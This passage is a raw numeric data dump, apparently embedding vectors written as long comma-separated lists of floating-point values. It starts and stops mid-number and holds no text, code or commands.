,-0.008714904,0.01931719,-0.005316751,-0.0008554655,-0.0119143715,-0.017805908,0.013527017,0.011261065,-0.000026432788,0.0072139013,0.017203283,-0.017906364,0.015964955,-0.019213285,0.0005620693,-0.036707405,0.014177574,-0.007468225,-0.002746739,0.008957405,-0.011426316,-0.003007495,0.02879296,0.0033608836,0.010973962,0.001274968,0.019665962,0.01909973,0.03973031,-0.027531534,-0.010361339,0.004999719,0.010399056,-0.008527999,-0.022946406,0.001977796,-0.015245296,0.0023731126,0.002952404,-0.009341007,-0.021000592,0.007251355,-0.006468474,-0.01509493,0.035842773,0.0049600657,-0.028583389,-0.019977553,0.017442917,0.00600836,0.027661221,-0.0033912826,-0.035247568,0.0031897654,0.0052459287,0.0070593595,0.041724466,0.013706011,-0.025646964,-0.004417082,-0.009967267,0.017817892,-0.036601428,0.013091311,0.000036003385,0.014150561,-0.0087944325,-0.006559986,-0.017444171,0.01149314,-0.026955662,-0.014373166,0.0017291749,0.007053672,-0.010391808,0.01638898,0.005723676,-0.00039559303,0.03535231,-0.00439826,0.03101298,0.0014331354,0.002966377,0.009312743,-0.023116482,-0.019839047,0.010690552,0.054232646,0.0037532593,-0.019741224,0.021161413,-0.00522437,0.0030428767,0.014667236,-0.006674783,0.009133941,-0.024923546,-0.026854444,-0.005982871,-0.013622303,0.004014879,-0.02800892,0.015037861,0.021285206,0.022035811,-0.000058885103,0.019777384,0.02475018,-0.019909816,-0.014925432,0.0059569553,0.009669533,0.004260447,0.014619261,0.004165239,0.0018028613,-0.005959624,-0.022394013,-0.024933511,-0.00055119686,0.0050679,0.0075928946,-0.03531509,-0.025476221,0.0012187151,-0.002164136,-0.0026417288,0.011955309,0.01046608,0.0118223475,-0.024987986,-0.0023880892,-0.03367148,-0.038139135,0.007376117,0.009567985,0.0019686648,0.00019903094,0.003714066,-0.0065422733,-0.006406157,0.009335927,-0.008387352,-0.005824406,-0.0065670945,0.01220522,-0.0022834316,0.015182202,-0.01764749,-0.022334153,-0.015791932,-0.016831119,0.0028348372,0.0040537496,-0.0009971281,0.0015883872,0.01869766,-0.009286307,-0.012028479,-0.017471083,-0.00528847,0.0015464664,0.0027230915,-0.012120461,-0.019619744,-0.0063985097,0.022887867,0.020529388,0.027516915,0.013311136,-0.0022129552,-0.014610734,-0.038672574,-0.016856184,0.03562197,-0.020288315,0.0091755325,0.007541572,-0.004620857,0.0069608213,0.0014881089,0.013507044,0.02035452,0.0146102775,-0.001003267,0.020289421,-0.016326422,0.01185988,0.012892406,0.013533398,-0.013464177,0.01343806,-0.00025767338,-0.009545152,0.012200107,0.013077808,-0.027076418,0.0034637174,-0.019808324,0.021396194,-0.026726004,-0.00842468,0.03950834,0.0022757587,0.0071742004,0.027947588,-0.013732998,-0.013498431,-0.0010949469,0.018008087,0.009969741,0.013623739,-0.0071464027,0.00949923,0.009175792,-0.03528072,0.0150591275,0.0024672586,0.035883702,0.019344129,-0.006982917,-0.0143877575,-0.005485566,0.019128524,0.025580125,0.0009666215,0.020790922,-0.027833857,-0.030179366,-0.0068900124,-0.013313622,-0.0312264,0.012971095,-0.001878234,-0.014856241,-0.04652917,0.0034861064,-0.00695263,0.014765622,-0.0033554262,-0.00081623,0.0076147555,0.005540398,-0.022855137,-0.007152538,-0.014744744,-0.0030330122,0.000105510204,0.046225037,0.009484486,0.0053666322,-0.023892323,0.020972954,0.02588453,-0.0066660424,0.01543273,0.002379504,-0.009606283,-0.0197905,-0.0065388056,0.0036930605,0.0051429616,-0.003287344,0.006631357,0.011346149,-0.004392297,-0.004256161,0.010187933,-0.00084658654,0.004032912,-0.0036727793,-0.004782042,0.016745232,0.006790449,0.035774436,-0.008158299,-0.0046432847,-0.006859485,0.009377847,-0.0124486685,0.0049209194,-0.04410605,-0.025368597,0.019218184,-0.032426428,0.003645753,0.001936115,-0.001566099,0.025582483,-0.030471317,-0.025862994,-0.00088887464,-0.011421096,-0.021096556,-0.022982318,-0.0060853893,-0.013504753,-0.017995292,-0.0016075107,0.003343153,0.014413369,0.00020910335,-0.0025433267,-0.018745935,0.028735483,0.009280462,-0.025629528,-0.00717957,0.0113574695,0.01386758,-0.0016847553,0.011798807,-0.025341788,-0.0272891,0.05400438,-0.028437296,-0.00863299,-0.0017566889,0.024236824,0.018594977,0.002992599,0.004466365,-0.0062141437,-0.02493502,-0.0035557535,-0.03251918,0.019791879,0.0023887306,-0.016474934,-0.01471586,0.014066253,-0.013362386,0.014629745,-0.00925948,0.02579216,-0.0034407214,0.023604523,0.0033891057,-0.023014605,-0.046062153,0.0025915843,0.0235956,-0.016190536,0.015354766,0.011258119,-0.024600888,-0.012392227,0.0038474018,-0.030542733,0.012252646,0.011961357,-0.010777127,0.013018268,0.0007042059,0.022715893,0.008909893,-0.009987735,-0.0032749558,0.00041669406,-0.017312847,-0.009115439,0.00877532,-0.0064689904,0.0040367865,-0.010850355,0.0009973787,0.0255053,0.04008216,-0.013746599,0.034165516,0.009723805,-0.009236537,0.006714668,0.010826515,0.023520567,0.0045410222,-0.026846832,-0.026813151,0.03552606,0.011598232,-0.010348534,-0.026753975,-0.0021116303,-0.005067532,-0.013468436,0.022568004,0.004554774,0.018474398,0.005169229,0.010546483,0.017712904,-0.008796812,-0.0009836539,0.012378591,0.0068517523,0.008813376,-0.009172065,-0.015037814,0.013649433,0.0014230581,0.00022049634,0.022233836,-0.0014853793,0.028128456,0.04128807,-0.004892765,0.025075529,-0.005558171,-0.014825385,0.0017172674,-0.009641462,-0.030691415,0.022617279,-0.017536776,-0.026975099,-0.0024173586,-0.0036506318,-0.010312501,-0.016491387,0.004681395,-0.08861391,0.024658525,-0.0027605002,-0.008623237,-0.0142681375,-0.020053878,0.017275887,0.027095748,0.009488082,-0.04208305,-0.015993308,0.019183083,0.011127518,0.0009230947,0.0009899708,0.0027359135,-0.034316763,-0.0142366635,-0.017160656,0.0052614296,0.02677794,-0.026729532,0.018848157,0.004239607,0.0059708445,-0.0052464725,0.008197728,0.00938434,-0.009453548,0.0040200828,-0.0019296061,-0.004599014,0.0065387283,0.022811709,0.004546796,0.011479967,0.0016193062,0.010592481,0.016971232,0.0070799543,0.003805032,-0.0011445474,0.01616005,-0.015812617,0.025027137,0.011114311,0.0068180645,0.024137203,0.0016832643,0.03195165,-0.010993125,-0.009030809,0.0064435233,-0.013270222,-0.00009570859,-0.023963049,0.0035430093,-0.018804258,0.019829113,0.0046718847,0.0011169607,0.0037898128,0.0051706787,-0.019472545,0.005130348,0.0059191156,0.013761216,0.0073443637,-0.028113415,0.0030123927,-0.016881967,0.01898409,0.0064384495,0.0041649374,0.006815902,0.018035026,-0.00525479,-0.0015624196,-0.022936275,0.013164451,-0.020992015,-0.01087836,-0.0036964815,0.02907436,-0.008210201,-0.02125542,-0.009864475,0.014223633,-0.012408365,0.017115826,-0.0063276105,-0.01593752,-0.00683523,-0.028119788,0.003029877,0.0178531,-0.0043381695,0.0024562925,-0.009068723,0.005352557,-0.0013302031,0.006519504,-0.006426211,-0.004549238,-0.12032212,-0.016189292,0.017544992,-0.0119662825,-0.012529253,-0.008644118,0.027578948,0.004630902,0.044073135,0.021783883,-0.028374024,0.016300648,-0.010221379,-0.0067408024,-0.018892232,0.0030378331,-0.017849617,-0.018887267,-0.00029136683,-0.009170368,-0.014395369,-0.020335753,0.0106932465,0.014531542,-0.007887774,0.004694667,0.017703561,0.02378575,0.03299475,-0.0008610093,-0.0046392633,0.0052627535,0.007070278,0.015832825,-0.035175506,0.0063049584,0.00448088,-0.01887358,-0.0031117867,0.014161556,0.0062546018,-0.004901888,0.004745816,0.007753064,-0.010624266,-0.0058157207,-0.024510426,0.024617203,-0.010376854,-0.011108967,0.015215901,-0.0036717674,0.0007565374,0.009012261,-0.014270439,-0.00700658,-0.013464551,0.0021482273,0.007208515,0.005111346,-0.0012231272,-0.008384911,-0.011189492,0.019616118,0.005493642,0.01778738,-0.017285714,0.008478946,-0.006196422,0.00843084,0.0017250263,0.019667028,-0.001325255,-0.0040385486,0.02522744,-0.013946251,0.020756472,0.028258203,0.017302217,-0.0017739449,0.00019662335,-0.023966385,0.008318222,-0.0060087284,-0.018650701,0.004362696,0.0072312453,-0.012169471,-0.008130165,0.0075250133,0.01653958,0.0030144465,0.0010195858,0.02408158,0.005501321,0.01649143,0.053937446,0.004157067,-0.021450302,-0.016536629,-0.014775009,-0.004754732,-0.008317416,0.014197154,-0.021644086,0.013975622,0.02016954,-0.01213066,-0.002562171,-0.010816403,-0.0038947896,0.043853384,-0.009762675,-0.0023081438,0.01265162,-0.0044930456,-0.008521263,0.012883551,-0.0066095046,-0.019852972,0.004622456,0.003270402,-0.012217093,-0.017974868,-0.0060594124,-0.016898522,-0.014460628,0.022806702,-0.010198759,-0.03309495,0.008166805,0.005668856,0.012000586,-0.0030396313,-0.0041177412,0.0060344674,-0.011512442,0.008181738,0.011798616,0.00925007,0.0070785396,0.006791849,-0.019252572,-0.0048902472,0.017800556,0.008321472,-0.012922376,-0.0074498234,-0.007507031,-0.0005746606,-0.013574444,-0.027999504,0.025078958,0.02046787,0.002192834,0.006344523,-0.017086465,-0.0026792206,0.008619393,0.011323992,-0.012325793,0.025150001,0.02884933,0.0036880178,-0.015261861,-0.013458488,-0.012883652,0.00922222,0.0023244014,0.0010952754,-0.0013705106,0.0017980919,0.013693639,-0.0448945,0.0128661115,0.01572428,0.0064941705,0.019873034,0.028587013,0.02480216,-0.009797082,0.0039870217,-0.009734645,-0.008629437,0.011395933,0.023203462,-0.034232125,0.0033106508,-0.0029032019,-0.014336283,0.04293842,0.00556221,-0.01743792,-0.012166048,0.004573654,-0.003004373,0.0028700917,0.023658585,0.011228016,0.016043734,-0.028232718,0.008209061,0.007431429,-0.009538524,0.010467098,-0.007596567,0.003412778,0.030912146,0.005631126,-0.013673527,-0.013640628,0.014562076,-0.013392426,-0.018198544,0.0075119245,-0.0004181205,0.006599949,-0.019414136,0.00984639,0.021282516,-0.0037918112,-0.035020478,0.00900049,-0.0019649894,-0.0030190686,0.03236706,0.01947356,0.028770078,-0.0397751,-0.028025271,0.0020536736,0.018745113,-0.024534678,0.002297388,0.0048805433,-0.004196838,0.018185854,0.0041889003,0.0012668743,0.017514486,0.032858644,0.022351269,0.025351843,0.03474806,0.020101044,-0.0045710816,0.0021280332,0.00069686724,0.036517877,0.03219209,-0.0095407795,-0.0068749785,-0.0023360988,-0.012755075,0.009502194,0.010309422,0.0024672772,0.0004939763,-0.011053085,0.022961242,-0.03660328,-0.005473976,-0.007041588,-0.0030095677,-0.007989423,0.004201026,0.00468092,-0.01924022,0.008424269,0.003931917,0.022702247,0.011991685,-0.017085528,0.020136354,-0.0060715177,-0.008356453,-0.0108057605,0.0071690264,0.019360142,-0.0014457772,0.0070008095,-0.011204024,0.00002916833,0.021599993,0.0045449487,0.016794236,-0.009827494,0.0056584184,-0.004836919,-0.015269239,0.030435259,0.008832998,0.012395692,-0.0030842035,-0.026241265,0.002250057,0.01170697,-0.002895793,0.0062875734,0.020144107,0.022053616,-0.021898808,0.0066074794,-0.0041645044,0.017098852,-0.00392304,-0.0043529915,0.022403667,-0.0027160714,-0.0051236525,-0.0053023035,0.0133676585,-0.0041630105,0.0061419955,0.020218765,0.022334492,0.000036532183,-0.0015273211,-0.036495283,-0.0219343,-0.0057748198,-0.002494284,0.011827001,-0.0057484563,0.01360686,-0.00272028,0.01203873,0.036525548,-0.0084657315,0.014422589,0.019485913,-0.019304885,-0.007624869,0.013054092,0.022061655,-0.0049914676,0.017922835,0.028925259,-0.009249445,0.01704734,0.005962967,-0.007343827,-0.0030370946,0.0031651135,0.0055301753,0.0077130436,0.012605386,0.013930121,0.024454322,-0.0018013159,0.0047388365,-0.0010870026,0.008311956,-0.019864162,-0.03363425,0.02870971,-0.040798623,-0.0011879527,0.004778579,0.004969363,-0.0050853156,0.014653995,0.0018320567,-0.012751197,0.003756626,-0.014487496,-0.028495982,0.016669324,-0.023137253,0.0036728648,-0.013333842,0.03153739,-0.024064029,-0.030751534,0.00035015325,-0.08808509,-0.0085947225,0.016022928,-0.0022054526,0.046187706,0.015166167,-0.0012119238,-0.0016923927,-0.020636812,0.031136231,0.014655595,-0.002247778,-0.014008399,0.01066504,0.027771108,-0.0024008446,-0.011648778,0.0051327054,0.0031364253,-0.022661287,0.007839836,-0.0001740253,-0.022956569,-0.014308307,0.011910648,-0.0029477137,-0.015900975,-0.006865528,0.011307726,0.010090556,-0.0030676057,-0.011537568,0.006917107,0.0020234014,-0.0009952071,0.012553755,-0.010196687,0.017373525,-0.0036393907,-0.050526585,0.012045159,-0.004085863,-0.0070527713,-0.00010884604,-0.022026954,0.01907936,-0.047099054,-0.0037418718,0.0009301745,0.005033547,-0.0054850923,0.017956989,-0.010002282,0.02887735,-0.0042677736,0.014178532,-0.00082909083,-0.019053478,0.02067932,0.0041448474,-0.018767416,0.010660325,0.010778681,-0.0074164933,-0.0050346944,0.015925251,0.0023453839,0.012913801,-0.009593754,-0.0025674873,0.028949047,-0.0323263,0.004361924,-0.008912136,-0.0018910287,0.0029036605,0.011917825,-0.009175033,-0.003551043,0.003743077,0.054130286,-0.014850784,0.02675414,-0.0057888525,0.0048085805,0.013774224,-0.008582772,-0.005579184,0.028231151,0.018297222,-0.016836323,-0.014271887,0.045788594,0.001478737,0.011878991,0.005044347,-0.008703942,0.009253947,-0.01068169,0.001740487,-0.0011458644,0.024977792,0.007313628,0.004027562,-0.009380799,-0.014615217,-0.0022011606,-0.019288892,-0.010570088,-0.0044961874,0.009621295,0.023652041,0.030971099,0.033893492,0.005685252,0.01438296,0.004248365,0.021569403,-0.015023056,-0.024112374,-0.0080509,-0.0030965414,-0.020860694,0.023947239,0.019638455,-0.0019491233,0.017494222,0.00035620332,-0.006151165,0.018101119,-0.0008805049,0.025701929,0.007946464,0.012065692,-0.0148360375,0.0012184902,-0.0055712373,0.026301593,0.0071853152,0.032776926,-0.0045022005,-0.026249923,-0.005067978,-0.007123426,-0.014044243,0.022921244,0.0023433978,0.010892017,0.00983486,-0.009383872,-0.0010529237,0.011028124,-0.007934956,-0.0021008383,0.009816952,0.0011673174,0.0064530573,0.008029536,-0.010808402,-0.0037307644,-0.0002816355,0.023293791,0.003113567,0.0076463763,-0.022029549,0.0044895257,0.0014756744,-0.009083499,0.005382129,-0.024694076,-0.027868405,-0.009829511,-0.0015048125,-0.0017006035,-0.03156972,0.0023150728,0.018107412,0.021532271,-0.006380194,0.002355114,-0.028683463,0.0002034808,-0.0041709538,-0.006992597,-0.013001588,-0.009653082,-0.00464026,-0.0068124426,0.006305494,0.0036005555,0.0023087359,-0.018842448,-0.02000304,-0.014351801,-0.00076137995,-0.013335476,-0.0012226233,-0.008709974,-0.016539266,0.014026608,-0.0020851057,0.013545718,-0.016497498,0.017213464,0.03536861,0.024279084,-0.0088875815,0.012489102,-0.003297653,-0.0067182393,-0.016872799,0.01332164,0.01436071,0.11602146,0.0036307161,0.0035548024,-0.0046433043,0.0044174264,0.0073848534,0.008351358,-0.017953474,0.0041973004,0.0078033693,0.033009015,-0.023247562,0.0043476126,-0.015917258,-0.001135953,0.021947244,0.0034629514,-0.02954301,0.016019126,-0.00012465368,0.012224362,-0.0053333566,-0.02120829,-0.037662882,-0.011493241,-0.06625695,0.045666423,0.008691768,0.00437732,0.014100194,0.008564714,-0.007938667,-0.005926621,0.026069492,-0.026762696,0.0014214757,0.0071202577,-0.019449975,-0.0024759327,-0.027291086,0.028811157,-0.0015792169,-0.011780751,-0.013613254,-0.011636272,-0.014897093,-0.013801808,-0.018853715,-0.0008659407,-0.016252453,0.0037151335,-0.00614296,0.015794406,-0.0026510367,0.007187195,-0.017492848,-0.007802089,0.017828321,0.011351246,-0.0018312184,0.008836858,0.011067737,0.0040494506,-0.005022942,0.017591093,0.0008566136,-0.009377762,-0.02264294,-0.0033908973,-0.019719835,0.011137509,-0.019788934,0.00096548744,0.000013442892,0.008586896,0.010131086,-0.009259647,-0.00010167687,-0.003391998,-0.0051793433,0.004751688,-0.008217478,0.00391094,0.013589786,0.016164599,0.0015501266,-0.0037187445,0.007083904,0.0019430486,-0.012292009,-0.0132242115,0.019576138,0.025241276,0.017645456,-0.0053512095,-0.00450806,0.0154042635,0.0028397806,-0.0061426656,0.0017016627,-0.007126213,-0.0012281829,0.0047953534,0.021373995,0.010636857,-0.0010222874,-0.0015937288,0.027269825,0.011462933,-0.0023018883,0.010871758,0.007950692,-0.0012124924,0.016177606,-0.0037928112,0.02842262,-0.019757818,0.006125734,0.016513152,-0.022437911,-0.007462827,0.026719278,0.015323435,0.023707995,-0.017987441,0.0018355829,-0.009531333,-0.0019447661,-0.00023303338,-0.00468685,-0.0012950298,-0.02860804,0.00038236295,0.025040358,0.003514473,0.0069842627,0.031885702,-0.0056629493,-0.00031955977,0.014457186,0.023912884,-0.0204373,-0.012948145,-0.010578799,0.018936625,-0.032246795,0.029186912,0.011393547,0.02410333,-0.024526294,-0.005789537,0.020561103,-0.025039714,0.001533925,-0.0005304969,-0.013701046,-0.0133138,0.013886943,-0.0128965955,-0.013938523,0.010305581,-0.00523758,0.008254859,-0.05783757,0.015362899,0.02245185,0.0019408228,0.006162183,0.0070986515,-0.006840553,-0.008713951,0.014362624,0.008672513,0.006647543,-0.024164801,-0.0036810087,0.010978133,0.011279542,-0.0097161755,0.004950467,0.01328631,0.009011846,-0.009647235,-0.002741341,0.018766234,-0.0038030476,0.0022026116,-0.008454766,-0.022658411,0.019221637,0.0018484915,0.0057710167,-0.0038084341,0.012562977,-0.012172054,0.014473728,-0.032536544,0.038879484,-0.01962037,-0.0416024,-0.0038961258,0.006971387,0.015992532,-0.007555711,0.0038810577,-0.0145616,-0.01060951,-0.018889248,0.0073431325,-0.01588992,-0.0074647255,0.0047041452,-0.016462563,-0.022237636,-0.023505155,0.0073878104,-0.0139692575,-0.013621766,-0.0010289623,-0.0102838855,0.0013049411,0.01275784,-0.0016874956,0.00067914004,0.019816589,0.0002890012,-0.019338436,0.014316256,0.0105659375,-0.025092658,-0.025826925,0.0051930966,0.0007916911,-0.014900642,-0.018408297,0.010249866,0.017372278,0.018055897,0.00561595,0.012370923,0.0020116724,0.0014766626,0.02238107,-0.0069619846,-0.014712462,-0.005958549,-0.0093591735,-0.015778244,0.0033607443,-0.016772464,-0.042929456,0.0041392124,-0.018808462,-0.012937943,-0.017304866,-0.006579504,-0.010614418,0.013301728,0.014804591,-0.018641798,0.0032264017,0.03930287,-0.0064129024,0.016669393,-0.0067798314,-0.020495536,0.00635489,0.005772467,-0.018122537,0.0052411132,0.0016297292,0.015582019,-0.001159944,0.024865108,-0.004943791,0.005468939,-0.0059921024,0.0018582459,-0.009013044,-0.020437565,-0.0021607843,-0.014832548,-0.0026100446,-0.0097337505,-0.004309457,-0.003362624,-0.021789396,0.037376646,0.0359275,-0.068794064,-0.003640215,0.0035288022,-0.00092997646,-0.036929194,0.019516308,0.0023896063,-0.02192083,-0.02821582,0.016157463,0.0028377706,-0.024240214,-0.047601692,0.0014357081,0.0123851625,0.002917507,-0.0043239444,0.01398398,-0.010595023,-0.011655392,0.0073100077,0.0047981204,-0.0015198219,-0.014000704,-0.0002061438,-0.00686256,-0.015894715,0.014406265,-0.006612482,0.009603551,-0.00074627483,0.016662842,-0.013352079,-0.0077292537,0.007616121,-0.004615151,0.01823053,-0.0010028463,-0.020033002,-0.03121384,-0.0016456693,-0.0047500734,0.014044133,0.007049651,-0.016190875,-0.031245723,0.01729478,0.003729229,0.13580418,-0.024580942,0.00007771788,0.0049239593,0.005133605,-0.010648924,0.00792468,0.022584977,0.01993757,0.015753252,0.01744008,-0.0082293,-0.000067269444,0.018101871,-0.007913101,-0.007379563,0.010281094,0.103062786,-0.019308386,0.03828399,0.009881043,0.01451767,-0.007503046,0.014010253,0.02508493,-0.0932811,0.002657871,-0.04595627,-0.0067881867,0.015963258,-0.047913264,0.018871069,-0.008033717,0.009906067,-0.00643084,-0.0012456487,-0.013611738,-0.012434336,-0.042933576,0.005995007,0.011951194,-0.0045916173,-0.018961467,0.011639474,-0.007896524,0.0020274445,-0.019816125,-0.004885744,0.01424704,0.033795856,0.013486526,-0.019528693,0.011692687,0.005843697,0.0038887314,-0.006840722,0.015409914,0.007957153,-0.029330475,0.015186903,-0.00051577203,0.009885701,-0.01074115,0.029589616,-0.014097262,-0.008942073,-0.011673662,0.013860482,0.015910698,0.028005501,0.036564156,0.011073791,-0.0021758662,-0.0066340794,0.04474313,-0.014577692,-0.016984504,0.005086629,0.0011238755,-0.002836654,0.03998808,0.0042027296,-0.0057997312,0.0047462154,0.008089578,0.012415185,0.0014489504,0.019532897,0.007636794,-0.013022314,-0.0026045877,0.011488188,-0.027117388,0.012709767,0.020816527,0.025321487,0.0058295457,-0.007736642,0.016599732,-0.014094029,0.0028405262,0.026983513,-0.0124216275,-0.008658213,-0.0022085588,0.021048581,-0.01588526,-0.031503998,-0.0013191488,0.006132693,0.009887029,0.017844668,-0.00524436,0.01656377,-0.009674069,-0.008118811,-0.00917883,-0.00085156923,-0.024312064,-0.008155505,0.0074418415,0.0015546619,-0.006893324,0.019451581,-0.016683597,0.0043365713,0.020042028,0.022418939,-0.013626509,-0.010826437,-0.0025602293,-0.0021011115,0.0137610175,0.048375346,-0.0056047817,-0.017990941,0.014198586,-0.041478828,-0.02598814,-0.0042689797,0.0031565963,0.0043668966,0.016546732,0.0060054027,-0.0065337634,-0.011556683,0.010877824,-0.0055576772],[0.0053868718,0.027916742,-0.023601053,-0.014311354,0.010835147,-0.018317454,0.011714214,0.024882086,-0.015310408,-0.011063919,0.019894596,0.004925723,-0.007958884,0.00024141594,-0.007851362,0.005034464,0.0032840956,0.0014167241,-0.0019015413,-0.016649997,0.0064435974,-0.0011028879,0.020439925,0.018726304,0.024764027,0.008220805,-0.019772802,0.008429495,0.012422455,0.0024489919,0.0040783305,0.021708768,0.031105755,0.0057394234,0.021274235,-0.018237552,-0.0115203345,0.0063548135,-0.00043246362,-0.007994066,-0.02665389,0.013339909,0.009974932,0.005988939,-0.0042114425,-0.0077682934,-0.025701104,0.010997166,0.001734873,0.0116494335,0.03677948,0.0007014235,-0.021324785,0.018725678,0.010191301,0.0016092719,-0.008899344,-0.0045299777,-0.007531423,-0.027211279,0.0016456955,0.0040389886,-0.01785639,-0.0100777475,0.026911587,-0.0072611906,-0.012777467,0.0031468028,0.010450363,-0.017644001,0.0119932005,0.010413588,0.0071947183,-0.022164179,0.008235605,0.011022211,0.0068748123,-0.013792293,-0.016913217,0.020528775,-0.015174115,-0.0054748105,0.017593814,-0.0028121904,0.008986057,0.012002936,-0.0050370824,0.0063496237,-0.018502066,-0.017343983,-0.022984568,0.0064152316,0.013964809,0.008402222,-0.03337639,0.005007063,0.013133557,0.0019779361,0.009943436,0.020924127,-0.018423231,0.00048010307,-0.007621087,0.011931592,0.012705855,-0.003562515,-0.009363118,-0.020561188,-0.014194426,-0.013529524,-0.0059087723,0.011816478,0.011209653,-0.0178423,0.004967416,-0.010218346,0.010701009,-0.004848082,-0.022663632,0.009396964,-0.011274273,0.02525595,0.015439747,-0.017913958,-0.026934352,-0.011751257,-0.0026780542,0.016824946,0.0065435027,-0.009233928,-0.0016039704,0.023883138,-0.0025639755,-0.0051881606,0.014383944,-0.007791474,-0.0048412946,-0.002034196,0.0019408229,-0.012421062,0.011072481,-0.013567281,0.014284694,-0.0023043999,0.0036108065,0.031518705,-0.01600073,0.029121047,0.0026412238,0.013867397,0.0065105744,0.0033400313,-0.027921734,-0.009178496,0.001446943,0.008914976,0.008383557,-0.031254806,-0.021500278,0.014061035,-0.0059888246,0.0069115306,0.011661298,-0.01530983,-0.015217622,-0.000022855518,-0.004783588,0.005056313,-0.02615626,0.0020419278,0.012069923,0.02753001,0.0019191974,-0.009905134,0.014148896,0.038761843,-0.009709682,0.0073429067,-0.00014415832,-0.011586028,0.009079632,0.013052378,0.00854372,0.005109203,-0.0029571527,0.029871708,-0.006306128,-0.02204176,-0.01774947,0.0033606896,0.022934971,-0.009774939,0.0038179436,0.016949171,-0.006339643,-0.022649717,-0.0057001538,0.08051154,-0.0008803605,0.007038588,0.0024387208,-0.006546224,0.013691509,-0.011476113,-0.010102221,0.02084693,-0.024472492,0.012443544,0.022705527,-0.012934854,0.015851807,-0.019504182,0.017506134,0.010215586,0.00045410404,-0.0686784,0.019717893,-0.016457148,0.01585249,-0.0040737805,0.000489451,0.011778845,0.00022825945,-0.02154507,0.00253285,0.002765915,-0.00481918,-0.0032730089,-0.027164744,-0.0146421315,0.007750061,0.010716201,-0.0004836924,-0.036427755,-0.015346642,-0.011585082,-0.004112306,-0.0046938863,-0.010665863,-0.002689284,-0.0076768636,0.024005119,0.02246745,0.03871169,0.0004300871,0.010986646,-0.0008933997,-0.009303748,-0.009047894,0.013416593,0.0014756005,-0.013867763,0.023327049,0.033637583,-0.0029942235,-0.0012275956,-0.016109679,-0.012229727,-0.012555601,0.0067528076,0.023865867,0.03094516,-0.013639266,0.023315582,0.015718097,-0.0027459955,0.016626604,-0.023687223,-0.007961689,-0.010311835,0.0024316832,-0.026625907,-0.00051012624,-0.024537742,0.015075236,-0.018046724,-0.0022495168,-0.014109553,0.016245449,0.0001929477,0.0010120549,-0.013143686,-0.0052849245,-0.02418983,-0.008353024,0.011354586,-0.025213249,-0.0035233577,0.031545367,0.0047188364,0.005063563,0.012059909,0.0478727,-0.016029272,-0.012494931,0.00016073763,-0.019656725,0.019982114,0.015719539,-0.007400908,0.007464428,-0.0027829953,0.0107212765,-0.019848429,0.00959504,-0.0053248266,0.00087486376,0.033434603,-0.0076685003,0.018022578,-0.02118297,-0.014948734,-0.014357947,0.007585903,0.0065068235,0.012073337,0.007871801,-0.0043151667,0.014903172,0.0035278462,0.014297156,-0.015255286,0.015707273,-0.008785749,-0.010915824,0.012313262,0.01057803,-0.005220651,0.02325879,0.017947342,-0.012608161,0.0064912764,0.018277189,0.02297346,-0.01384335,0.028047528,-0.005174095,0.014103123,0.018545043,-0.006879752,-0.02234324,-0.012004475,-0.014317343,0.015240256,-0.0051415255,-0.00096802885,-0.0008493223,0.0090425955,0.007234798,0.03387822,0.0182004,-0.0047107544,0.0019510112,-0.006628029,-0.009147925,-0.012144526,-0.005648137,-0.0044248574,-0.0046455376,-0.0052856808,0.033636842,-0.009260915,-0.02130798,-0.018273251,0.06303754,0.016807666,-0.0081107635,0.01094798,-0.0031638127,-0.017599327,0.041401133,0.01541561,-0.0024763762,0.0046726097,-0.001964254,-0.015447032,0.00092219893,0.02512436,-0.02040833,0.008483622,-0.017121753,-0.012370141,-0.017350683,-0.005929746,0.05041582,0.008733858,-0.00075800123,-0.011937211,0.012756583,0.02848912,-0.008492002,0.013945639,0.0046462645,-0.0150634665,0.0015304601,-0.004806664,0.005789835,-0.002663051,-0.038069893,-0.006940888,0.019934285,-0.0032204178,-0.0192965,-0.006342182,0.023520382,0.02967114,-0.01637974,-0.040914264,-0.0030086024,0.025331166,0.0016106049,-0.022744881,-0.01511936,0.018406639,0.0010155791,0.011614789,-0.033009082,0.006064266,-0.009246063,0.005426348,-0.014055667,-0.03338684,0.04394548,0.030430904,0.0185348,0.028393006,-0.016285693,-0.0058318623,-0.022639053,0.017372234,-0.008059777,0.0075531527,-0.0112884585,-0.032308288,0.0035705573,0.0050949,-0.016626658,0.008343378,-0.01068586,0.004630857,-0.011041785,-0.008291943,0.00038424146,0.031816337,0.0007731945,-0.0027935568,0.002012959,-0.019731686,0.013237024,-0.003428208,-0.0109096095,-0.001120754,0.0031766568,-0.011542162,-0.0009049861,0.026149856,0.03505351,0.0026163722,0.010860747,0.022056952,-0.0043997834,0.01873554,0.0023299083,-0.0042934534,-0.009414564,0.0075067207,-0.020545224,-0.023261964,-0.0029699702,-0.008442713,-0.00050987623,0.006338269,-0.0066657993,0.027894339,-0.023724996,0.004182796,0.012197951,-0.011130645,0.008406285,-0.025749546,0.0032172138,-0.010839398,-0.0050821383,-0.005042936,0.033528674,-0.00095223234,0.0049480577,0.006011386,0.003218465,0.018891102,-0.015965665,-0.01599945,-0.005120565,0.013460174,0.0034213935,0.010919534,0.02554671,-0.025775986,0.012159963,0.021122497,-0.014062194,-0.053774945,0.047230072,0.022308478,0.008596251,0.008480513,0.024393363,0.002402431,0.024190363,0.012844749,0.03917494,-0.011284499,-0.017596645,0.0052052676,0.004458067,-0.00086614175,0.01508103,-0.0005664625,0.020925287,0.01595203,0.027079882,0.012552973,0.022551065,0.02735658,0.012206229,-0.023232523,0.014123224,0.017158415,-0.007025656,0.032041777,0.01290741,0.030923827,-0.016654292,-0.028683232,-0.007902774,0.033630434,0.021792103,0.0027142188,0.020471383,0.010157396,-0.008402658,-0.0027121452,0.015678588,-0.010387104,0.009055636,-0.016266353,-0.003578548,0.0042058737,-0.02646588,-0.009915655,-0.0034248813,0.015294542,0.0007070501,-0.0034712262,-0.0060808593,-0.003436001,0.010658438,0.0046045245,0.0041812654,-0.028698444,-0.0065949424,-0.02006804,0.008333277,0.019586772,0.004036898,-0.00976068,0.0034621565,0.028065719,-0.012410492,0.0014175276,0.024301581,0.004049491,0.0022717263,0.022127124,0.021184588,0.00000865952,-0.012351722,0.010112266,0.022413878,-0.0049060886,0.008077473,-0.027667237,0.012079869,0.0077906507,0.0045132283,-0.010368042,-0.0072313864,0.0029101162,0.009797459,0.0016977796,0.008887526,0.0014586177,-0.0031783546,0.0017928437,-0.024398975,-0.017792497,-0.0104947295,-0.020120958,0.007968167,0.0041474057,-0.009389991,0.02173065,-0.011864917,-0.0024495504,-0.019948063,-0.0015850377,0.004893107,0.0014701603,0.029059486,0.0028954668,-0.006777925,-0.0009354546,0.03028119,-0.011341113,0.00026985735,0.022092821,0.0009606895,-0.014399732,0.017453594,-0.0017340549,-0.